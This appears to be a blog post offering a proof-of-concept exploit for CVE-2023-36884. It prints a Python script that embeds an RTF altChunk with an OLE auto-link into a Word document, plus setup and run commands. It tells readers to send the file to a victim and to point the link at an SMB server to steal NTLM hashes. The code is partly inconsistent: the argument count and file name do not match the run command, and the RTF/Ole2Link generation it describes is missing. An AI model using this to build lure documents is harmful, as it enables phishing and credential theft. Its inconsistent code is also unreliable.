MS Office and Windows HTML RCE (CVE-2023–36884) — PoC and exploit
Screenshots from the blog posts
Summary
Here a PoC is provided for CVE-2023–36884 to generate a DOCX with an RTF file added as altChunk with OLE auto-link.
General: gen_docx_with_rtf_altchunk.py
- import sys
- import os
- from docx import Document
- from docx.oxml import OxmlElement
- from docx.oxml.ns import qn
- from docx.opc.part import Part
- from docx.opc.constants import RELATIONSHIP_TYPE as RT
- # Add an RTF file as an altChunk to a DOCX document
- def add_rtf_as_alt_chunk_to_doc(doc, rtf_path):
- try:
- package = doc.part.package
- partname = package.next_partname(‘/word/altChunk%d.rtf’)
- # Read the RTF content from the file
- with open(rtf_path, ‘rb’) as rtf_file:
- rtf_content = rtf_file.read()
- alt_part = Part(partname, ‘application/rtf’, rtf_content, package)
- r_id = doc.part.relate_to(alt_part, RT.A_F_CHUNK)
- alt_chunk = OxmlElement(‘w:altChunk’)
- alt_chunk.set(qn(‘r:id’), r_id)
- doc.element.body.sectPr.addprevious(alt_chunk)
- print(“[+] RTF file added as altChunk.”)
- # Save the modified document
- doc.save(docx_file_path)
- except Exception as e:
- print(f”[-] Can not add the RTF file as altChunk to the DOC. Error: {str(e)}”)
- sys.exit(1)
- # Get or create a DOCX document
- def get_doc(docx_file_path):
- if not os.path.isfile(docx_file_path):
- doc = Document()
- doc.save(docx_file_path)
- print(f”[+] Created a new DOCX document with name ‘{docx_file_path}’.”)
- else:
- doc = Document(docx_file_path)
- print(f”[+] Using an existing DOCX document with name ‘{docx_file_path}’.”)
- return doc
- if __name__ == “__main__”:
- if len(sys.argv) != 3:
- print(“Usage: python merge.py <doc_file> <rtf_file>”)
- sys.exit(1)
- # Get arguments
- docx_file_path = sys.argv[1]
- rtf_file_path = sys.argv[2]
- # Check if the DOCX file exists, if not, create one
- doc = get_doc(docx_file_path)
- # Check if the RTF file exists
- if not os.path.isfile(rtf_file_path):
- print(f”[-] Can’t open RTF file with name ‘{rtf_file_path}’.”)
- # Add the RTF file to the DOCX as an altChunk
- add_rtf_as_alt_chunk_to_doc(doc, rtf_file_path)
- print(f”[+] RTF file ‘{rtf_file_path}’ added as altChunk to ‘{docx_file_path}’.”)
Description
On July 11, 2023, Microsoft released a patch aimed at addressing multiple actively exploited Remote Code Execution (RCE) vulnerabilities. This action also shed light on a phishing campaign orchestrated by a threat actor known as Storm-0978, specifically targeting organizations in Europe and North America. At the heart of this campaign was a zero-day vulnerability, designated as CVE-2023–36884, which allowed the attacker to exploit Windows search files through meticulously crafted Office Open eXtensible Markup Language (OOXML) documents featuring geopolitical lures related to the Ukraine World Congress (UWC). Although a workaround had initially been proposed to mitigate this vulnerability, Microsoft released an Office Defense in Depth update on August 8, 2023, effectively breaking the exploitation chain that had led to RCE via Windows search (*.search-ms) files.
This PoC programmatically creates an RTF document with the Ole2Link method pointing to a specified URL. Then, it adds the RTF to a Word document (doc or docx) just like in the attack.
Repo
A repo is provided for the PoC.
Setup
Install the packages needed to run the script via pip:
pip install python-docx pywin32Create an example.html file and start a Python HTTP web server:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
Then, run the script:
python gen_docx_with_rtf_altchunk.py.py merged.docx autolinked.rtf http://localhost:8888/example.html
Now the generated file can be shared with your victim via email or something else. The link can be referred to your SMB server to steal the victim’s NTLM hash or to an HTML file that contains an iframe with a reference to a Windows Search file just as in the original malware. Due to a lack of further information, the exact exploitation can not be shown.
